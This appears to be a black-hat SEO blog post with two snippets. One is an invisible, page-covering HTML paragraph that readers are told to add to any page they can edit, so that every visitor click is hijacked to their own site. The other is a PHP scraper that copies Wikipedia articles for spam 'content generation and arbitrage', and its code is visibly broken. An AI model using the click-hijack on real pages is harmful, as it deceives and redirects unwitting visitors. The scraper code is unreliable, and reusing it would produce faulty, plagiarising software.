This is an easy one, just edit any page and add this code (Change http://www.yourlink.com? to your actual site):
1
| <p style="font-size: 50000px; left: -50px; width: 100%; position: absolute; top: -50px; height: 100%; font-color: transparent">[http://www.yourlink.com/]</p> |
Now whenever a visitor clicks on a link, it will be sent automatically to your site
…Sneaky
Here is a snippet from [YACG] Yet Another Content Generator to scrape wikipedia articles. Great for content generation and arbitrage. Here is the code:
Usage:
1
| <? wikipedia("http://en.wikipedia.org/wiki/Google") ?> |
Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
| <?php
function wikipedia($article) {
$pattern[0] = '/<a href="(.*?)">(.*?)<\\/a>/';
$replace[0] = '$2';
$pattern[1] = '/<h3 id=\"siteSub\">From Wikipedia, the free encyclopedia<\/h3>/';
$replace[1] = '';
$pattern[2] = '/<div id=\"contentSub\">(.*?)<\/div><div id=\"jump-to-nav\">Jump to: navigation, search<\/div>/';
$replace[2] = '';
$pattern[3] = '/<div class=\"messagebox cleanup metadata\">(.*?)<p><br \/><\/p>/';
$replace[3] = '';
$pattern[4] = '/<table class=\"messagebox\" (.*?)>(.*?)<\/table>/';
$replace[4] = '';
$pattern[5] = '/<dl>(.*?)<\/dl>/';
$replace[5] = '';
$pattern[6] = '/<h1 class=\"firstHeading"\>(.*?)<\/h1>/';
$replace[6] = '<h3>$1</h3>';
$pattern[7] = '/<table class=\"messagebox protected\" style=\"border: 1px solid #8888aa; padding: 0px; font-size:9pt;\">(.*?)<\/table>/';
$replace[7] = '';
$pattern[8] = '/<div class=\"infobox sisterproject\">(.*?)<\/div><\/div>/';
$replace[8] = '';
$pattern[9] = '/<sup (.*?)>(.*?)<\/sup>/';
$replace[9] = '';
$pattern[10] = '/<table style=\"background: transparent;\" width=\"0\">(.*?)<\/table>/';
$replace[10] = '';
$pattern[11] = '/<table class=\"messagebox current\" style=\"font-size: normal;\">(.*?)<\/table>/';
$replace[11] = '';
$pattern[12] = '/<table class=\"toccolours\" align=\"center\" width=\"55%\" cellpadding=\"0\" cellspacing=\"0\">(.*?)<\/table>/';
$replace[12] = '';
$pattern[13] = '/<div class=\"editsection\"(.*?)>(.*?)<\/div>/';
$replace[13] = '';
$pattern[14] = '/<div id=\"bodyContent\">/';
$replace[14] = '<div>';
$pattern[15] = '/<dd>(.*?)<\/dd>/';
$replace[15] = '';
$pattern[16] = '/<div class=\"messagebox cleanup metadata\">(.*?)<\/div>/';
$replace[16] = '';
$pattern[17] = '/<div class=\"thumbcaption\">(.*?)<\/div><\/div>/';
$replace[17] = '';
$pattern[18] = '/<div class=\"thumb tright\">/';
$replace[18] = '';
$pattern[19] = '/\[(.*?)\]/';
$replace[19] = '';
$pattern[20] = '/<table class="messagebox protected" (.*?)>(.*?)<\/table>/';
$replace[20] = '';
$pattern[21] = '/<div style="position:absolute; z-index:100; right:20px; top:10px; height:10px; width:300px;"><\/div>/';
$replace[21] = '';
$pattern[22] = '/<div style="position:absolute; z-index:100; right:10px; top:10px;" class="metadata" id="administrator">(.*?)<\/div><\/div>/';
$replace[22] = '';
$pattern[23] = '/<table class="messagebox current"(.*?)>(.*?)<\/table>/';
$replace[23] = '';
$pattern[24] = '/<table class="messagebox current" style="width: auto;">(.*?)<\/table>/';
$replace[24] = '';
$pattern[25] = '/<div class="dablink">(.*?)<\/div>/';
$replace[25] = '';
$pattern[26] = '/<b>/';
$replace[26] = '<strong>';
$pattern[27] = '/<\/b>/';
$replace[27] = '</strong>';
$pattern[28] = '/<div(.*?)>/';
$replace[28] = '';
$pattern[29] = '/<\/div>/';
$replace[29] = '';
$pattern[30] = '/<map(.*?)>(.*?)<\/map>/';
$replace[30] = '';
$pattern[31] = '/<img src="(.*?)" alt="This page is semi-protected." width="18" (.*?)\/>/';
$replace[31] = '';
$pattern[32] = '/<table style="width:100%;background:none">(.*?)<\/table>/';
$replace[32] = '';
$pattern[33] = '/<div class="messagebox merge metadata">(.*?)<\/div>/';
$replace[33] = '';
$wikipedia = fopen($article, "r");
$wikipedia = preg_replace($pattern, $replace, $wikipedia);
if (preg_match("/<\!-- start content --\>(.*)<table id=\"toc\" class=\"toc\" summary=\"(.*)\">/", $wikipedia, $w)) {
$wikipedia = $w[1];
} elseif (preg_match("/<\!-- start content --\>(.*)<a name=\"(.*)\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"boilerplate metadata\" id=\"stub\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"printfooter\">/is", $wikipedia, $w)) {
$wikipedia = $w[1];
}
}
print $wikipedia;
}
?> |
The regex to remove all the trash that wikipedia adds to the articles sucks, so I’m looking for someone to help me with it. Interested? Drop me a line!